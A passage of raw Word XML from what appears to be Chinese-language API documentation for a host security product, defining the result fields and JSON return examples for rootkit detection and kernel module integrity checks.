            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E05863E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04FB9E24" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>100)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43EE8599" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>命中crontab内容的文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6F51A216" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C4176F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>"detail":{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>extra_info</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":"",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "file_sha256":"",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "modify_time":1550564341,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "file_md5":"",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "file_sha1":"",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "check_type":"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dirs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "access_time":1550564341,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rootkit_name":"ddgs3011 rootkit",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "file_permission":"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rwx-wx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>---",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "change_time":1550564341,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>file_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":"/var/spool/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/crontabs",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>file_owner":"root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "file_size":4096,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>file_group":"crontab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>已知rootkit二期</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>"detail": "{\"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rootkit_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\":\"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Fuckit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Rootkit\",\"files\":[{\"extra_info\":\"\",\"file_sha256\":\"6ea43b2ef985f10fbbebf1aff9c302e1f448395</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>bbf548aed1c1511d03aa5a72d\",\"file_md5\":\"91f94b1ccffbd4381f86eaaf98fcb4b2\",\"file_sha1\":\"d1e0248ea42947ae405a9613f51d30fd8dc22074\",\"check_type\":\"core\",\"access_time\":1554717866,\"modify_time\":1554717797,\"file_permission\":\"rw - r--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>r</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>--\",\"change_time\":1554717866,\"file_name\":\"/etc/1\",\"file_owner\":\"root\",\"file_size\":5,\"file_group\":\"root\"}],\"level\":3,\"crontab\":[{\"rule\":\"abcd\",\"file\":\"/etc/hosfilt\"}]}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C3D776" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="469" w:name="_Toc115166307"/>
      <w:bookmarkStart w:id="470" w:name="检查功能系统内核模块检查"/>
      <w:bookmarkEnd w:id="468"/>
      <w:r>
        <w:t>检查功能：系统内核模块检查</w:t>
      </w:r>
      <w:bookmarkEnd w:id="469"/>
    </w:p>
    <w:p w14:paraId="0E2DB76A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="471" w:name="_Toc115166308"/>
      <w:bookmarkStart w:id="472" w:name="缺失模块检查"/>
      <w:r>
        <w:t>缺失模块检查</w:t>
      </w:r>
      <w:bookmarkEnd w:id="471"/>
    </w:p>
    <w:p w14:paraId="0AE2266B"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630"/>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="3630"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="5EA57D8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0E8803C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="128C3B77" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28D20A84" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CEA2BF8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6E78E5F3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DCE1D08" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>add</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="373C8616" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27F0CD17" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BF8AFB0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>多余模块(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>lsmod</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>相对/proc/modules)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1CA61E35" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F1A9483" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>lack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29C03B89" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EB8B75B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F5F0DEE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>缺失模块(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>lsmod</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>相对/proc/modules)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2BE19A51" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E9DEB6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "add": [],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "lack": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>udp_diag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>binfmt_misc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp_diag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>inet_diag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bnep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bluetooth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">  ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1191F6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="473" w:name="_Toc115166309"/>
      <w:bookmarkStart w:id="474" w:name="恶意内核模块"/>
      <w:bookmarkEnd w:id="472"/>
      <w:r>
        <w:t>恶意内核模块</w:t>
      </w:r>
      <w:bookmarkEnd w:id="473"/>
    </w:p>
    <w:p w14:paraId="3019336E"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1775"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1791"/>
        <w:gridCol w:w="1791"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="7F6E81F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1D6CB1E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="383B14AB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D94A4A2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A7CC3C0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6AA8FCFB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D7D3CDF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>malicious_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="589503F6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67C5E31C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>64)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DA694D8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>恶意模块名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="29EEC78C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FFE1334" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>file_sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0133B2EC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3763B31E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06DB6643" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="07653BD4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="486A09F8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>file_sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="270D4D35" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4457A320" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7119D74B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="72564CBA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51B4F6ED" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>file_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2671C3CE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75718A47" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FD2BAD5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7C5A473D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73CA631E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>access_time</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3649774D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B729320" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3582F769" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>最近访问时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="13D1C435" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E6BF608" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>file_md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7ECA68F2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3628F62A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C78729C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="604403B4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7160F08E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>file_permission</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2EF9667B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30DD4FEE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35502FBC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="156DEEE9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C4F0A60" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>modify_time</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F4DD39F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17BC774C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
